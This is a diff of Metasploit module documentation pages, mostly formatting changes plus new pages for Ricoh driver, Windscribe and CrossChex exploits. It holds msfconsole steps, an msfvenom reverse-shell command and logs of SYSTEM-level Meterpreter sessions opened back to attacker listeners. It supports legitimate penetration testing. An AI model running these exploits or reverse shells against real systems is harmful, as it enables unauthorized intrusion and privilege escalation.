+    [*] Command Stager progress -  92.91% done (11543/12424 bytes)
+    [*] Command Stager progress -  96.28% done (11962/12424 bytes)
+    [*] Sending stage (206403 bytes) to 192.168.159.129
+    [*] Command Stager progress -  99.84% done (12404/12424 bytes)
+    [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:17626) at 2020-03-02 10:40:52 -0500
+    [*] Command Stager progress - 100.00% done (12424/12424 bytes)
+    
+    meterpreter > getuid
+    Server username: NT AUTHORITY\SYSTEM
+    meterpreter > sysinfo
+    Computer        : EXCHANGE
+    OS              : Windows 2012 R2 (6.3 Build 9600).
+    Architecture    : x64
+    System Language : en_US
+    Domain          : MSFLAB
+    Logged On Users : 9
+    Meterpreter     : x64/windows
+    meterpreter > 
+
+[1]: https://github.com/pwntester/ysoserial.net
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-  Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation. 
+  Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation.
  Since this application is started with system privileges this allows a system remote code execution.

 ## Verification Steps
@@ -1,10 +1,9 @@
-The module exploits a RCE bug on vulnerable installations of Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required.
-
-The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP ports `8080` and `8443` by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM.
-
-
 ## Vulnerable Application

+  The module exploits a RCE bug on vulnerable installations of Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required.
+
+  The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP ports `8080` and `8443` by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM.
+
  On a Windows machine, download and install a trial version of HPE IMC from here:

  [https://h10145.www1.hpe.com/downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19066&ProductNumber=JG748AAE&lang=&cc=&prodSeriesId=&SaidNumber=](https://h10145.www1.hpe.com/downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19066&ProductNumber=JG748AAE&lang=&cc=&prodSeriesId=&SaidNumber=)
@@ -21,7 +20,7 @@ The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP po
  2. Start msfconsole
  3. Do: ```use exploit/windows/http/hp_imc_java_deserialize```
  4. Do: ```set RHOSTS <RHOSTS>```
-  5. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp``` 
+  5. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp```
  6. Do: ```set LHOST <LHOST>```
  7. Do: ```check```
  8. **Verify** that you are seeing `The target is vulnerable.` in console.
@@ -67,4 +66,4 @@ All versions below 7.3 E0504P2 should be vulnerable remotely.
  Logged On Users : 1
  Meterpreter     : x86/windows
  meterpreter > 
-  ```
+  ```
@@ -1,18 +1,20 @@
-## Description
+## Vulnerable Application
+
+### Description

 This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM.
 This exploit was successfully tested on version 9, build 90109 and build 91084.

 **NOTE:** By default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file `rdslog0.txt`.
       
-## ManageEngine Desktop Central 9
+### ManageEngine Desktop Central 9

 Desktop Central is integrated desktop and mobile device management software that helps in managing servers, laptops, desktops, smartphones, and tablets from a central location. It is used for automating your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more. It supports managing both Windows, Mac and Linux operating systems.

-## Prerequisites
+### Prerequisites

 1. Start a Windows VM (such as Win 7)
-2. Install a vulnerable version of ManageEngine Desktop Central. This exploit was tested on Build [90109](http://archives.manageengine.com/desktop-central/90109/) and [91084](http://archives.manageengine.com/desktop-central/91084/). 
+2. Install a vulnerable version of ManageEngine Desktop Central. This exploit was tested on Build [90109](http://archives.manageengine.com/desktop-central/90109/) and [91084](http://archives.manageengine.com/desktop-central/91084/).
 3. After installation, verify that the server is working by visiting it with a browser. Depending on the version, the server port may be 8020, or 8040.

 ## Verification Steps
@@ -1,9 +1,9 @@
 ## Vulnerable Application

  [Install Octopus Deploy server](https://octopus.com/docs/getting-started#Gettingstarted-InstalltheOctopusserver)
-  
+
  [Create a test user/team](https://octopus.com/docs/administration/managing-users-and-teams) - Team should have "Project contributor" and "Project deployer", or just "System administrator" and add your test user.
-  
+
  [Create an API key](https://octopus.com/docs/how-to/how-to-create-an-api-key)

 ## Verification Steps
@@ -42,6 +42,7 @@
  **SSL**

  Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic.
+
 ## Scenarios

 ### Octopus Deploy Server 3.16.0
@@ -142,4 +143,4 @@ PS C:\Octopus\ADTest\Work\20170516025952-24> exit
 [*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

 msf exploit(octopusdeploy_deploy) > 
-  ```
+  ```
@@ -1,13 +1,13 @@
-## Description
-This module exploits the lack of proper authentication checks in IBM Websphere Application Server ND that allows for the execution of an arbitrary command and upload of an arbitrary file as SYSTEM. The module serializes the required Java objects expected by the IBM Websphere server.
-
-The vulnerability was identified by @rwincey (b0yd) of [Securifera](https://www.securifera.com/) and was assigned [CVE-2019-4279](https://www-01.ibm.com/support/docview.wss?uid=ibm10883628).
-
-
 ## Vulnerable Application
-The module affects [IBM Websphere Application Server Network Deployment](https://www.ibm.com/support/knowledgecenter/en/SSAW57/mapfiles/product_welcome_wasnd.html). The agent is installed on servers with the network deployment feature and listens on TCP port 11002,11004, or 11006. The vulnerability affects versions up to 9.0.0.11.
+
+This module exploits the lack of proper authentication checks in IBM Websphere Application Server ND that allows for the execution of an
+arbitrary command and upload of an arbitrary file as SYSTEM. The module serializes the required Java objects expected by the IBM Websphere server.
+
+The module affects [IBM Websphere Application Server Network Deployment](https://www.ibm.com/support/knowledgecenter/en/SSAW57/mapfiles/product_welcome_wasnd.html).
+The agent is installed on servers with the network deployment feature and listens on TCP port 11002,11004, or 11006. The vulnerability affects versions up to 9.0.0.11.

 ## Verification Steps
+
 To use this exploit you will need access to IBM Websphere Application Server Network Deployment.

 1. Install the IBM Websphere Application Server Network Deployment on a host.
@@ -21,10 +21,12 @@ To use this exploit you will need access to IBM Websphere Application Server Net
 The result should be that calc.exe is executed on the target machine.

 ## Scenarios
+
 The exploit module contains several targets as detailed below.

 ### Target 0: Windows Powershell Injected Shellcode
-This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). 
+
+This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell).

 ```
 msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce
@@ -1,6 +1,6 @@
-## Description
+## Vulnerable Application

-This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request. 
+This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request.

 **IMPORTANT:** The target IIS machine must meet these conditions to be considered as exploitable:

@@ -8,7 +8,7 @@ This module can be used to execute a payload on IIS servers that have world-writ
 2. It allows Read and Write permission.
 3. It supports ASP.

-## WebDAV
+### WebDAV

 Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol (HTTP) that allows clients to perform remote Web content authoring operations. WebDAV is defined in RFC 4918 by a working group of the Internet Engineering Task Force.

@@ -16,10 +16,10 @@ Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hyperte

 1. Do: ```use exploit/windows/iis/iis_webdav_upload_asp```
 2. Do: ```set payload windows/meterpreter/reverse_tcp```
-2. Do: ```set LHOST [IP]```
-3. Do: ```set RHOST [IP]```
-3. Do: ```set PATH / [PATH]```
-4. Do: ```run```
+3. Do: ```set LHOST [IP]```
+4. Do: ```set RHOST [IP]```
+5. Do: ```set PATH / [PATH]```
+6. Do: ```run```

 ## Scenarios

@@ -1,4 +1,6 @@
-## Introduction
+## Vulnerable Application
+
+### Introduction

  This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
  the current user hive, and inserting a custom command that will get invoked when
@@ -14,12 +16,11 @@

 ## Usage

-  You'll first need to obtain a session on the target system.  
+  You'll first need to obtain a session on the target system.
  Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options.
  The module use an hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system.
  On slower system this may be too short, resulting in no session being created. In this case disable the automatic payload handler (`set DISABLEPAYLOADHANDLER true`)
  and manually create a job handler corresponding to the payload.
-  

 ## Scenarios

@@ -1,10 +1,10 @@
 ## Introduction

-This module will bypass UAC on any Windows installation with Powershell installed. 
+This module will bypass UAC on any Windows installation with Powershell installed.

 There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
 When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
-%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must 
+%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must
 be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog.

 ## Usage
@@ -9,13 +9,13 @@

  The module modifies the registry in order for this exploit to work. The modification is
  reverted once the exploitation attempt has finished.
-	
+
  The module does not require the architecture of the payload to match the OS. If
  specifying EXE::Custom your DLL should call ExitProcess() after starting the
  payload in a different process.

 ## Usage
-	
+
  1. First we need to obtain a session on the target system.
  2. Load module: `use exploit/windows/local/bypassuac_sluihijack`
  3. Set the `payload`: `set payload windows/x64/meterpreter/reverse_tcp`
@@ -5,7 +5,7 @@ is run with the "autoElevate" property set to true, and it will automatically
 launch a file from a low-privilege registry location with elevated privileges.
 To bypass, simply place the binary on disk, write its location in the
 correct registry key, and run WSReset.exe.  The binary will be run with elevated
-privileges. 
+privileges.

 ## Usage

@@ -1,34 +1,38 @@
 ## Introduction
-  This module will abuse the SeImperonsate privilege commonly found in 
-services due to the requirement to impersonate a client upon 
-authentication. As such it is possible to impersonate the SYSTEM account 
-and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM 
-attack at which intercepts the hash and relay responses from RPC to be 
-able to establish a handle to a new SYSTEM token. Some caveats : Set 
-your target option to match the architecture of your Meterpreter 
-session, else it will inject the wrong architecture DLL into the process 
-of a seperate architecture. Additionally, after you have established a 
+
+  This module will abuse the SeImperonsate privilege commonly found in
+services due to the requirement to impersonate a client upon
+authentication. As such it is possible to impersonate the SYSTEM account
+and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
+attack at which intercepts the hash and relay responses from RPC to be
+able to establish a handle to a new SYSTEM token. Some caveats : Set
+your target option to match the architecture of your Meterpreter
+session, else it will inject the wrong architecture DLL into the process
+of a seperate architecture. Additionally, after you have established a
 session, you must use incognito to imperonsate the SYSTEM Token.

 ## Build Instructions
+
 This builds using visual studio 2017 and tools v141.  Attempts
 to compile with previous verstions of build tools will succeed but
 the resulting binary fails to exploit the vulnerability.

 ## Usage
+
  You'll first need to obtain a session on the target system.
-  Next, once the module is loaded, one simply needs to set the 
+  Next, once the module is loaded, one simply needs to set the
 ```payload``` and ```session``` options, in addition to architecture.
-  
-  Your user at which you are trying to exploit must have `SeImpersonate` 
+
+  Your user at which you are trying to exploit must have `SeImpersonate`
 privileges.
-  
-  The module has a hardcoded timeout of 20 seconds, as the attack may 
-not work immediately and take a few seconds to start. Also, check to 
-make sure port 6666 is inherently not in use else the exploit will not 
-run properly
-  
+
+  The module has a hardcoded timeout of 20 seconds, as the attack may
+not work immediately and take a few seconds to start. Also, check to
+make sure port 6666 is inherently not in use else the exploit will not
+run properly.
+
 ## Scenarios
+
 ```
  Name Current Setting Required Description
   ---- --------------- -------- -----------
@@ -11,6 +11,15 @@ For more info see:
 - [Rotten Potato](https://github.com/foxglovesec/RottenPotato)
 - [Lonely Potato](https://decoder.cloud/2017/12/23/the-lonely-potato/)
 - [Juicy Potato](https://ohpe.it/juicy-potato/)
+- [No More Juicy Potato](https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/)
+
+## Vulnerable Applications
+
+Microsoft Windows Server 2008 R2, Server 2012, Server 2012 R2, and Server 2016 are known to be affected. Server 2019 was not affected by this issue.
+
+This issue was patched in Microsoft Windows 10 v1809 (build 17763). v1803 is the last vulnerable version. See [No More Juicy Potato](https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/) for technical details.
+
+At the time of disclosure, disabling DCOM was provided as a workaround to mitigate this vulnerability. As such, servers with DCOM disabled will not be vulnerable to this attack.

 ## Usage

@@ -1,27 +1,30 @@
 ## Introduction
-  This module will abuse the SeImperonsate privilege commonly found in 
-services due to the requirement to impersonate a client upon 
-authentication. As such it is possible to impersonate the SYSTEM account 
-and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM 
-attack at which intercepts the hash and relay responses from RPC to be 
-able to establish a handle to a new SYSTEM token. Some caveats : Set 
-your target option to match the architecture of your Meterpreter 
-session, else it will inject the wrong architecture DLL into the process 
-of a seperate architecture. Additionally, after you have established a 
+
+  This module will abuse the SeImperonsate privilege commonly found in
+services due to the requirement to impersonate a client upon
+authentication. As such it is possible to impersonate the SYSTEM account
+and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
+attack at which intercepts the hash and relay responses from RPC to be
+able to establish a handle to a new SYSTEM token. Some caveats : Set
+your target option to match the architecture of your Meterpreter
+session, else it will inject the wrong architecture DLL into the process
+of a seperate architecture. Additionally, after you have established a
 session, you must use incognito to imperonsate the SYSTEM Token.
+
 ## Usage
+
  You'll first need to obtain a session on the target system.
-  Next, once the module is loaded, one simply needs to set the 
+  Next, once the module is loaded, one simply needs to set the
 ```payload``` and ```session``` options, in addition to architecture.
-  
-  Your user at which you are trying to exploit must have `SeImpersonate` 
+
+  Your user at which you are trying to exploit must have `SeImpersonate`
 privileges.
-  
-  The module has a hardcoded timeout of 20 seconds, as the attack may 
-not work immediately and take a few seconds to start. Also, check to 
-make sure port 6666 is inherently not in use else the exploit will not 
+
+  The module has a hardcoded timeout of 20 seconds, as the attack may
+not work immediately and take a few seconds to start. Also, check to
+make sure port 6666 is inherently not in use else the exploit will not
 run properly
-  
+
 ## Scenarios
 ```
  Name Current Setting Required Description
@@ -1,8 +1,10 @@
 ## Vulnerable Application

-  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
+  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/)
+  or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).

-  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
+  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught,
+  so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.

  The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.

@@ -11,8 +13,6 @@

 ## Verification Steps

-  Example steps in this format:
-
  1. Install the application
  2. Wait for `C:\ProgramData\Panda Security\Panda Devices Agent\Downloads` folder to appear
  3. Start msfconsole
@@ -28,7 +28,7 @@
  **DLL**

  Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used.  However the dll seems to be VERY picky.  Default is cryptnet.dll.  See the chart for more details.
-  
+
 |                                           | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
 |---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
 | 64bit target (1), win10 x64 | CRASH | CRASH | NO |  NO       | valid     |    no |
@@ -38,9 +38,9 @@
 | 32bit target (0), win7sp1 x86 |  |  | valid |       | valid (caught by av)     |     |

 In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSEvents didn't crash, but no session was obtained.  `valid` means we got a shell.
-  
+
  **ListenerTimeout**
-  
+
  How long to wait for a shell.  PSEvents.exe runs every hour or so, so the default is 3610 (10sec to account for code execution or other things)

 ## Scenarios
@@ -48,7 +48,7 @@ In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSE
 ### Windows 8.1 x86 with Panda Antirivus Pro 2016 16.1.2

  Step 1, get a local shell.  I used msfvenom to drop an exe for easy user level meterpreter.
-  
+
    msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
    
    msf > use exploit/multi/handler 
@@ -58,7 +58,7 @@ Payload options (windows/x64/meterpreter/reverse_tcp):
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4545             yes       The listen port

-   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**
+   **DisablePayloadHandler: True   (no handler will be created!)**


 Exploit target:
@@ -0,0 +1,97 @@
+## Vulnerable Application
+
+  [Various Ricoh printer drivers](https://www.ricoh.com/info/2020/0122_1/list) allow escalation of
+  privileges on Windows systems.
+
+  For vulnerable drivers, a low-privileged user can
+  read/write files within the `RICOH_DRV` directory
+  and its subdirectories.
+
+  `PrintIsolationHost.exe`, a Windows process running
+  as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+  during the installation of a printer. A user can
+  elevate to SYSTEM by writing a malicious DLL to
+  the vulnerable driver directory and adding a new
+  printer with a vulnerable driver.
+
+  Multiple runs of this module may be required
+  given successful exploitation is time-sensitive.
+
+## Verification Steps
+
+  1. Install a vulnerable Ricoh driver
+  2. Start msfconsole
+  3. Get a session with basic privileges
+  4. Do: ```use exploit/windows/local/ricoh_driver_privesc```
+  5. Do: ```set SESSION <sess_no>```
+  6. Do: ```run```
+  7. You should get a shell running as SYSTEM.
+
+## Scenarios
+
+### Tested on Ricoh PCL6 Universal Driver `v4.13`
+
+  ```
+  msf5 > use multi/handler
+  msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (206403 bytes) to 192.168.37.199
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.199:49670) at 2020-02-06 12:47:59 -0600
+
+  meterpreter > getuid
+  Server username: DESKTOP-A97LIDN\ricoh-test
+  meterpreter > sysinfo
+  Computer        : DESKTOP-A97LIDN
+  OS              : Windows 10 (10.0 Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  meterpreter > background
+  [*] Backgrounding session 1...
+  msf5 exploit(multi/handler) > use ricoh_driver_privesc
+
+  Matching Modules
+  ================
+
+     #  Name                                        Disclosure Date  Rank    Check  Description
+     -  ----                                        ---------------  ----    -----  -----------
+     0  exploit/windows/local/ricoh_driver_privesc  2020-01-22       normal  Yes    Ricoh Driver Privilege Escalation
+
+
+  [*] Using exploit/windows/local/ricoh_driver_privesc
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(windows/local/ricoh_driver_privesc) > check
+  [*] The target appears to be vulnerable. Ricoh driver directory has full permissions
+  msf5 exploit(windows/local/ricoh_driver_privesc) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Adding printer JLFJCi...
+  [*] Sending stage (206403 bytes) to 192.168.37.199
+  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.199:49673) at 2020-02-06 12:48:40 -0600
+  [*] Deleting printer JLFJCi
+  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\GFHCkvh.bat
+  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\headerfooter.dll
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : DESKTOP-A97LIDN
+  OS              : Windows 10 (10.0 Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  ```
@@ -0,0 +1,81 @@
+## Description
+
+  The Windscribe VPN client application for Windows makes use of a
+  Windows service `WindscribeService.exe` which exposes a named pipe
+  `\\.\pipe\WindscribeService` allowing execution of programs with
+  elevated privileges.
+
+  Windscribe versions prior to 1.82 do not validate user-supplied
+  program names, allowing execution of arbitrary commands as SYSTEM.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on [Windscribe](https://windscribe.com/)
+  version 1.80 and 1.81 on Windows 7 SP1 (x64).
+
+  Download:
+
+  * https://assets.windscribe.com/desktop/win/Windscribe_1.80.exe
+  * https://assets.windscribe.com/desktop/win/Windscribe_1.81.exe
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/windows/local/windscribe_windscribeservice_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *SYSTEM* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `%TEMP%`)
+
+
+## Scenarios
+
+### Windows 7 SP1 (x64)
+
+  ```
+  msf5 > use exploit/windows/local/windscribe_windscribeservice_priv_esc 
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > check
+  [*] The service is running, but could not be validated.
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Writing payload (283 bytes) to C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe ...
+  [*] Sending C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe to \\.\pipe\WindscribeService ...
+  [+] Opended \\.\pipe\WindscribeService! Proceeding ...
+  [*] Sending stage (180291 bytes) to 172.16.191.242
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49365) at 2020-01-31 19:14:31 -0500
+  [-] Failed to delete C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe: stdapi_fs_delete_file: Operation failed: Access is denied.
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : TEST
+  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  meterpreter >
+  ```
+
@@ -1,14 +1,15 @@
 ## Vulnerable Application
+
  Ahsay Backup v7.x - v8.1.1.50
  Download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`
  Start the application ( I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`)
-  
+
 ## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/windows/misc/ahsay_fileupload`
  3. enable create trial account `set CREATEACCOUNT true`
-  4. set RHOST `set RHOST 172.16.238.175` 
+  4. set RHOST `set RHOST 172.16.238.175`
  5. set LHOST `set LHOST 172.16.238.235`
  6. run exploit `run`
  7. We should receive a meterpreter shell.
@@ -22,12 +23,10 @@
   TARGETURI      - Path to Ahsay installation
   UPLOADPATH     - Path to where the file should be uploaded
   USERNAME       - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.
-   
+
 ## Scenarios

-### Version of software and OS as applicable
-
-This exploit has been tested on Windows 2003 SP2.
+### Ahsay 8.1.1.50 on Windows 2003 SP2

  ```
 msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
@@ -38,17 +38,16 @@
  6. `run`
  7. **Verify** Session opened

-
 ## Scenarios

-    msf5 > use exploit/windows/misc/ais_esel_server_rce 
+    msf5 > use exploit/windows/misc/ais_esel_server_rce
    msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
    rhosts => 10.66.75.212
          msf5 exploit(windows/misc/ais_esel_server_rce) > check
          [+] 10.66.75.212:5099 - The target is vulnerable.
    msf5 exploit(windows/misc/ais_esel_server_rce) > run

-    [*] Started reverse TCP handler on 10.66.75.208:4444 
+    [*] Started reverse TCP handler on 10.66.75.208:4444
    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
    [*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
@@ -0,0 +1,71 @@
+## Introduction
+
+CrossChex is a personnel identity verification, access control, and time
+attendance management system compatible with Windows 7,8 & 10. It uses
+UDP broadcasts to identify and connect with Access Control devices on a
+network. The code used to handle a response from an Access Control
+device is vulnerable to a Stack Buffer Overflow attack on CrossChex
+versions `Crosschex Standard x86 <= V4.3.12`. Tracked as CVE-2019-12518,
+and as such permits arbitrary code execution.
+
+The code used to overflow the Stack Buffer and code an attacker wishes
+to be executed as a result of the exploit are sent in a single UDP
+packet as a response to the CrossChex broadcast. As both the exploit and
+the payload must be contained inside a single UDP packet, an exploit has
+a maximum size of `8947 Characters`.
+
+This module exploits CVE-2019-12518 by listening for a CrossChex "new
+device" broadcast for a given number of seconds (`TIMEOUT`). It then
+responds with a UDP packet containing shellcode for both the Buffer
+Overflow exploit and the attacker's chosen payload. The `Space` payload
+option ensures no payload of too large a size is used to ensure
+successful exploitation. If a broadcast is not detected within the given
+`TIMEOUT`, the module exits with a warning.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use windows/misc/crosschex_device_bof`
+3. `set LHOST vboxnet0`
+4. `run`
+5. Open CrossChex
+6. Navigate to Device > Add
+7. Select `Search`
+8. Verify payload executes correctly
+
+## Options
+
+1.  `TIMEOUT` Seconds module waits for broadcast, defaults to `1000`.
+2.  `CHOST`. Address UDP packet response is sent from. Defaults to `0.0.0.0`.
+3.  `CPORT`. Port UDP packet response is sent from. Defaults to `5050` as CrossChex expects communication from this port.
+
+## Compatible Payloads
+
+Any basic x86 windows payload.
+
+## Payload Options
+
+As above.
+
+## Scenarios
+
+```
+msf5 exploit(windows/misc/crosschex_device_bof) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] CrossChex broadcast received, sending payload in response
+[*] Payload sent
+[*] Sending stage (180291 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49160) at 2020-02-10 16:21:13 +0000
+
+meterpreter > ls
+Listing: C:\Program Files\Anviz\CrossChex Standard
+==================================================
+...
+```
+
+## References
+
+1. <https://cvedetails.com/cve/CVE-2019-12518>
+2. <https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html>
+3. <https://www.exploit-db.com/exploits/47734>
@@ -2,7 +2,7 @@

  This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
  This vulnerability can allow remote code execution in the context of the user who ran it.
-  
+
  A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)

 ## Verification Steps
@@ -17,7 +17,7 @@
 ## Options

  **MAGIC**
-  
+
  This is the 5 character magic used by the server.  The default is `Gh0st`

 ## Scenarios
@@ -1,15 +1,15 @@
+## Vulnerable Application
+
 HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)

-This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also 
-HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. 
+This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also
+HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely.
 The service is vulnerable provided the Secure Channel feature is disabled (default).

 During testing, additional versions were verified to be vulnerable.  The following list documents them:

 - HP LoadRunner 12.53 Community Edition (non-default SSL turned off)

-## Vulnerable Application
-
 HP LoadRunner 9.50 or below, or a version documented above.

 ## Verification Steps
@@ -2,7 +2,7 @@

  This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.
  This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
-  
+
